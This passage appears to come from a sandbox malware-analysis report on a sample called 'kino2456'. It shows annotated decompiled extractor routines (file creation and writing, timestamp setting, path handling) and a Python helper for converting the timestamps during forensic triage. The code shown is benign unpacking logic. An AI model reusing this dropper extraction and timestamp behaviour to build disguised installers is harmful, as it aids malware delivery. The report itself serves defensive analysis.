                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t41 = E0096476D( &_v268, __eflags);
                                                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                                                    						_t30 = E00964980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = E009647E0( &_v268);
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x9693f4 =  *0x9693f4 + 1;
                                                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                                                    						_t54 = 0x9691e4;
                                                                                                                                                                                                                                    						_t63 = 0x9691e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                    						_t64 = _t63 - 0x9691e5;
                                                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 = 0x9691e4;
                                                                                                                                                                                                                                    						_t30 = E00964702( &_v268, 0x9691e4,  *(_t75 + 4));
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                    						_t30 = E00964C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E00964B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
            __eflags = _t30;
            if(_t30 == 0) {
                goto L3;
            } else {
                _t33 = 1;
                goto L35;
            }
        }
        _t30 = _t44 - 1;
        __eflags = _t30;
        if(_t30 == 0) {
            goto L3;
        }
        goto L9;
    }
    if(_a4 == 3) {
        _t30 = E00964B60( *((intOrPtr*)(_t75 + 0x14)));
    }
    goto L3;
}
                                                                                                                                                                                                                                    0x00964dc5
                                                                                                                                                                                                                                    0x00964dbd
                                                                                                                                                                                                                                    0x00964d2a
                                                                                                                                                                                                                                    0x00964d2a
                                                                                                                                                                                                                                    0x00964d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d2d
                                                                                                                                                                                                                                    0x00964cf8
                                                                                                                                                                                                                                    0x00964cfd
                                                                                                                                                                                                                                    0x00964d02
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00964DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00964DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 27504af929b917aff1843f64f1c7a0cfc092b989478f063ff9e4ee438feacb23
                                                                                                                                                                                                                                    • Instruction ID: a79665ef2f4258eeed5665a8ba88adafef047c967e85daa79bed1c2d4004144b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27504af929b917aff1843f64f1c7a0cfc092b989478f063ff9e4ee438feacb23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6413936A041019BCF219FB8DD64AFA73ADEB86740F144668D882976C5DF32EE46C750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                     			// Restores the timestamps of an extracted file from the DOS date (__edx) and DOS time (_a4) stored for it.
                                                                                                                                                                                                                                     			// __ecx indexes a table of 0x18-byte entries at 0x968d64; an entry whose first field is 1 is skipped,
                                                                                                                                                                                                                                     			// and the field at +0x10 (0x968d74) holds the open file handle.
                                                                                                                                                                                                                                     			E00964C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                     				struct _FILETIME _v12;
                                                                                                                                                                                                                                     				struct _FILETIME _v20;
                                                                                                                                                                                                                                     				FILETIME* _t14;
                                                                                                                                                                                                                                     				int _t15;
                                                                                                                                                                                                                                     				signed int _t21;
                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                     				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                     				// DOS date/time -> local FILETIME (_v20) -> UTC FILETIME (_v12); any failure returns 0
                                                                                                                                                                                                                                     				if( *((intOrPtr*)(_t21 + 0x968d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                     					L5:
                                                                                                                                                                                                                                     					return 0;
                                                                                                                                                                                                                                     				} else {
                                                                                                                                                                                                                                     					_t14 =  &_v12;
                                                                                                                                                                                                                                     					// creation, last-access and last-write time are all set to the same converted value
                                                                                                                                                                                                                                     					_t15 = SetFileTime( *(_t21 + 0x968d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                     					if(_t15 == 0) {
                                                                                                                                                                                                                                     						goto L5;
                                                                                                                                                                                                                                     					}
                                                                                                                                                                                                                                     					return 1;
                                                                                                                                                                                                                                     				}
                                                                                                                                                                                                                                     			}
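The conversion chain in E00964C37 (DOS date/time word pair, to a local FILETIME, to a UTC FILETIME, then SetFileTime on all three timestamps) reimplemented in Python as an added example; this is not code from the report or from the sample. The DOS bit layout and the FILETIME epoch are the documented Win32 formats. The time-zone bias is a parameter because the sandbox's zone is not stated on this page, and the 2023-03-21 14:30:10 sample value is constructed. The practical point for triage: files dropped under C:\Users\user\AppData\Local\Temp\IXP002.TMP\ carry whatever timestamps were packaged, not the time of execution, and created, accessed and modified all being identical is itself a tell.

```python
from datetime import datetime, timedelta, timezone

# 100-ns ticks from the FILETIME epoch (1601-01-01 UTC) to the Unix epoch.
FILETIME_UNIX_EPOCH = 116444736000000000
_UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def dos_datetime_to_local(dos_date: int, dos_time: int) -> datetime:
    """Unpack the two 16-bit DOS words that DosDateTimeToFileTime consumes (__edx, _a4)."""
    day    =  dos_date        & 0x1F
    month  = (dos_date >> 5)  & 0x0F
    year   = (dos_date >> 9)  + 1980          # 7-bit year offset from 1980
    second = (dos_time        & 0x1F) * 2     # 2-second granularity: odd seconds are lost
    minute = (dos_time >> 5)  & 0x3F
    hour   = (dos_time >> 11) & 0x1F
    return datetime(year, month, day, hour, minute, second)  # naive: local wall time, as the API treats it


def local_to_filetime(local: datetime, bias_minutes: int = 0) -> int:
    """LocalFileTimeToFileTime equivalent. bias_minutes follows TIME_ZONE_INFORMATION.Bias (UTC = local + Bias)."""
    utc = local.replace(tzinfo=timezone.utc) + timedelta(minutes=bias_minutes)
    unix_seconds = int((utc - _UNIX_EPOCH).total_seconds())
    return FILETIME_UNIX_EPOCH + unix_seconds * 10_000_000


def dos_to_filetime(dos_date: int, dos_time: int, bias_minutes: int = 0) -> int:
    """Whole chain as E00964C37 runs it: DOS words -> local FILETIME -> UTC FILETIME."""
    return local_to_filetime(dos_datetime_to_local(dos_date, dos_time), bias_minutes)


def filetime_to_utc(ft: int) -> datetime:
    """Reverse direction, for reading a FILETIME back out of an MFT record or a file listing."""
    return _UNIX_EPOCH + timedelta(seconds=(ft - FILETIME_UNIX_EPOCH) / 10_000_000)


def extracted_file_times(dos_date: int, dos_time: int, bias_minutes: int = 0) -> dict:
    """What SetFileTime(h, &ft, &ft, &ft) leaves on the dropped file: all three timestamps identical."""
    ft = dos_to_filetime(dos_date, dos_time, bias_minutes)
    return {"created": ft, "accessed": ft, "modified": ft}


if __name__ == "__main__":
    # Constructed sample: 2023-03-21 14:30:10 encoded as DOS date/time words (0x5675, 0x73C5), not values from the report.
    print(dos_datetime_to_local(0x5675, 0x73C5), dos_to_filetime(0x5675, 0x73C5))
    print(extracted_file_times(0x5675, 0x73C5, bias_minutes=-60))
```

When comparing a dropped file's $STANDARD_INFORMATION times against the process start time from the sandbox, convert with the bias the analysis VM actually used; a one-hour bias error moves every timestamp by 36,000,000,000 ticks.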








                                                                                                                                                                                                                                     [Disassembly addresses 0x00964c40 to 0x00964c8d for E00964C37; only the address column of the listing is present in this copy of the report]

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00964C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00964C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00964C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                     • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: a29fbabc534f2a5e2b7d2aa0689aff0b1b3f16e1b0d88ec7bc98de41e04e7ab4
                                                                                                                                                                                                                                    • Instruction ID: 80306f623fa5707970cd3585e836858fb63b4940349d7bba22ab7aeec3d35797
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a29fbabc534f2a5e2b7d2aa0689aff0b1b3f16e1b0d88ec7bc98de41e04e7ab4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0907261520CAFDB24DFF4CC48DFB7BACEB05240B44052BE855D1150EA74D914DBB2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                     			// Opens a file for extraction. __ecx is the path; __edx is a flag word whose bits select the
                                                                                                                                                                                                                                     			// CreateFileA access mask (_t18) and creation disposition (_t23). The asm("sbb ...") lines are the
                                                                                                                                                                                                                                     			// neg/sbb idiom (0xFFFFFFFF when the masked value is non-zero, else 0), which the decompiler prints as ~x.
                                                                                                                                                                                                                                     			E0096487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                     				void* _t7;
                                                                                                                                                                                                                                     				CHAR* _t11;
                                                                                                                                                                                                                                     				long _t18;
                                                                                                                                                                                                                                     				long _t23;
                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                     				_t11 = __ecx;
                                                                                                                                                                                                                                     				asm("sbb edi, edi");
                                                                                                                                                                                                                                     				// (__edx & 3) != 0: 0xC0000000 + 0x80000000 wraps to 0x40000000 = GENERIC_WRITE; otherwise 0x80000000 = GENERIC_READ
                                                                                                                                                                                                                                     				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                     				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                     					asm("sbb esi, esi");
                                                                                                                                                                                                                                     					// bit 0x100 clear: TRUNCATE_EXISTING (5) if bit 0x200 set, else OPEN_EXISTING (3)
                                                                                                                                                                                                                                     					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                     				} else {
                                                                                                                                                                                                                                     					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                     						asm("sbb esi, esi");
                                                                                                                                                                                                                                     						// bit 0x100 set, 0x400 clear: CREATE_ALWAYS (2) if bit 0x200 set, else OPEN_ALWAYS (4)
                                                                                                                                                                                                                                     						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                     					} else {
                                                                                                                                                                                                                                     						// bits 0x100 and 0x400 set: CREATE_NEW (1)
                                                                                                                                                                                                                                     						_t23 = 1;
                                                                                                                                                                                                                                     					}
                                                                                                                                                                                                                                     				}
                                                                                                                                                                                                                                     				// share mode 0 (exclusive), no security attributes, FILE_ATTRIBUTE_NORMAL (0x80), no template
                                                                                                                                                                                                                                     				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                     				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                     					return _t7;
                                                                                                                                                                                                                                     				} else {
                                                                                                                                                                                                                                     					// failed and not a plain OPEN_EXISTING: call E0096490C on the path, then retry once with the same arguments
                                                                                                                                                                                                                                     					E0096490C(_t11);
                                                                                                                                                                                                                                     					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                     				}
                                                                                                                                                                                                                                     			}

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00964A23,?,00964F67,*MEMCAB,00008000,00000180), ref: 009648DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00964F67,*MEMCAB,00008000,00000180), ref: 00964902
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 091fd89a913e670a4060f61e6ea41640ce95f709aeb1aae7ec95acc41c78fb02
• Instruction ID: 8b7c9a9612f77fa00e0b496c63b0b1ad02826e31d03eb960fdf2d71d3d9882b8
• Opcode Fuzzy Hash: 091fd89a913e670a4060f61e6ea41640ce95f709aeb1aae7ec95acc41c78fb02
• Instruction Fuzzy Hash: 79016DA3E5557026F32441694C88FB7551CCBD6B74F1B0739FDEAE71D1D5644C0481E0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
            E00964AD0(signed int _a4, void* _a8, long _a12) {
                signed int _t9;
                int _t12;
                signed int _t14;
                signed int _t15;
                void* _t20;
                struct HWND__* _t21;
                signed int _t24;
                signed int _t25;

                _t20 =  *0x96858c; // 0x268
                // E00963680 pumps the message queue (MsgWaitForMultipleObjects / PeekMessageA, see APIs below)
                _t9 = E00963680(_t20);
                if( *0x9691d8 == 0) { // global flag: when non-zero the write is skipped and -1 is returned
                    _push(_t24); // decompiler artifact, no effect on the logic
                    // write to the handle stored in the 0x18-byte table entry selected by _a4;
                    // the byte count written is stored back into _a12
                    _t12 = WriteFile( *(0x968d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                    if(_t12 != 0) {
                        _t25 = _a12;
                        if(_t25 != 0xffffffff) {
                            // accumulate total bytes written in a global counter
                            _t14 =  *0x969400; // 0xb8200
                            _t15 = _t14 + _t25;
                             *0x969400 = _t15;
                            if( *0x968184 != 0) {
                                _t21 =  *0x968584; // 0x0, dialog window handle
                                if(_t21 != 0) {
                                    // 0x402 = PBM_SETPOS: move progress bar 0x83a to (written * 100 / total) percent
                                    SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9693f8, 0);
                                }
                            }
                        }
                    } else {
                        _t25 = _t24 | 0xffffffff; // WriteFile failed: return -1
                    }
                    return _t25; // bytes written, or -1
                } else {
                    return _t9 | 0xffffffff;
                }
            }

APIs
  • Part of subcall function 00963680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0096369F
  • Part of subcall function 00963680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636B2
  • Part of subcall function 00963680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00964B05
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: bf3401c52d0f04ef1cd0e6885bb50039df4d50102722a6f399e2c51e8e8d9ece
• Instruction ID: 7ac0c8dff2428c57d2fac7debdb58b5247a15ee4daf481d38b2b115ecfc6d891
• Opcode Fuzzy Hash: bf3401c52d0f04ef1cd0e6885bb50039df4d50102722a6f399e2c51e8e8d9ece
• Instruction Fuzzy Hash: 3C01B131214211ABDB188FA8DC15BA6775DFB44725F148329F939A71F0CBB0D812EBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			#include <windows.h>

			// Path-append helper as recovered by the decompiler: __ecx holds a
			// NUL-terminated directory string, __edx its buffer size in characters,
			// _a4 the component to append. A single backslash is ensured between the
			// two parts, leading spaces of _a4 are skipped, and E009616B3 performs the
			// actual copy. 0x8007007a is HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER).
			E0096658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;
				intOrPtr* _t1; // temporaries the decompiler used without declaring
				void* _t2;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x968b3f
				_t12 = _t1;
				// inline strlen: advance until the terminating NUL
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12; // length of the existing string
				_t2 = _t18 + 1; // 0x968b40
				// only proceed if length + 1 still fits in the destination buffer
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx; // points at the terminating NUL
					if(_t19 > __ecx) { // non-empty string: inspect its last character
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) { // 0x5c == '\\'
							 *_t19 = 0x5c; // append a separator if none present
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					// skip leading spaces (0x20) of the component to append
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E009616B3(_t16, _t10, _t6);
				}
				return 0x8007007a; // buffer too small for length + 1
			}
Statement addresses (side column of the decompiler view, one per C line): 0x00966592, 0x00966594, 0x00966596, 0x00966598, 0x00966598, 0x0096659b, 0x0096659b, 0x0096659d, 0x0096659e, 0x009665a2, 0x009665a4, 0x009665a9, 0x009665b2, 0x009665b6, 0x009665ba, 0x009665c3, 0x009665c5, 0x009665c8, 0x009665c8, 0x009665c3, 0x009665c9, 0x009665cc, 0x009665d2, 0x009665d1, 0x009665d1, 0x00000000, 0x009665dc, 0x00000000

APIs
• CharPrevA.USER32(00968B3E,00968B3F,00000001,00968B3E,-00000003,?,009660EC,00961140,?), ref: 009665BA
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4d220838f48ff46c5834e11d250ab8c13b7336f78e84ff68164ac7e6fe46334b
• Instruction ID: 13b9b386df9c0ad7f528cedec6843ccfe6e20b461c79ea1a15334fa10c99a067
• Opcode Fuzzy Hash: 4d220838f48ff46c5834e11d250ab8c13b7336f78e84ff68164ac7e6fe46334b
• Instruction Fuzzy Hash: CCF04C321082509BD331491DD884B66BFDE9BC6350F28056EF8DBC3205CA659C45C7A4
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 93%
			#include <windows.h>

			// Decompiled routine that resolves the Windows directory into a
			// MAX_PATH (0x104) stack buffer and hands it to E0096597D; the
			// cookie read from 0x968004 and re-checked on return via E00966CE0
			// matches the MSVC /GS stack-protection pattern.
			E0096621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t8; // undeclared in the raw decompiler output
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x968004; // 0xf4cc89a0, global security cookie
				_v8 = _t5 ^ _t21; // cookie XOR frame pointer, stored in the frame
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					// 0x4f0 = 2;  decompiler artifact (constant on the left-hand side); the
					// original store could not be recovered from this listing
					_t9 = E0096597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					// failure path: unresolved helper, then a global at 0x969124 is updated
					E009644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x969124 = E00966285();
					_t9 = 0;
				}
				// stack-cookie verification before returning _t9
				return E00966CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}
Statement addresses (side column of the decompiler view, one per C line): 0x00966229, 0x00966230, 0x00966247, 0x0096626a, 0x00966272, 0x00966249, 0x00966255, 0x0096625f, 0x00966264, 0x00966264, 0x00966284

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0096623F
  • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
  • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
  • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 90b93f52b48ba22f6162459f4bc0474612e32d8fc8030e54e5bef8453fcdb0c0
• Instruction ID: 52fdfc5ed9475b6aec4979686b6e88d28ffe1f814f3e1d8dbf41cc6fa027bf28
• Opcode Fuzzy Hash: 90b93f52b48ba22f6162459f4bc0474612e32d8fc8030e54e5bef8453fcdb0c0
• Instruction Fuzzy Hash: 66F0E2B0708208BBE760EB748D02FBE37ACDB94300F40046EB996D7191EDB49D849690
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00964B60(signed int _a4) {
	signed int _t9;
	signed int _t15;

	_t15 = _a4 * 0x18;
	if( *((intOrPtr*)(_t15 + 0x968d64)) != 1) {
		_t9 = FindCloseChangeNotification( *(_t15 + 0x968d74)); // executed
		if(_t9 == 0) {
			return _t9 | 0xffffffff;
		}
		 *((intOrPtr*)(_t15 + 0x968d60)) = 1;
		return 0;
	}
	 *((intOrPtr*)(_t15 + 0x968d60)) = 1;
	 *((intOrPtr*)(_t15 + 0x968d68)) = 0;
	 *((intOrPtr*)(_t15 + 0x968d70)) = 0;
	 *((intOrPtr*)(_t15 + 0x968d6c)) = 0;
	return 0;
}

Decompiled line addresses: 0x00964b66, 0x00964b74, 0x00964b98, 0x00964ba0, 0x00000000, 0x00964bac, 0x00964ba4, 0x00000000, 0x00964ba4, 0x00964b78, 0x00964b7e, 0x00964b84, 0x00964b8a, 0x00000000
APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00964FA1,00000000), ref: 00964B98
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 116351e94128b10cb723c1d2615db14012c66cc8ad694530e46189704303543a
• Instruction ID: 4667ac9d4f53161eaeaa6b2095029296f213f503c1f02ee09893884d259a61b4
• Opcode Fuzzy Hash: 116351e94128b10cb723c1d2615db14012c66cc8ad694530e46189704303543a
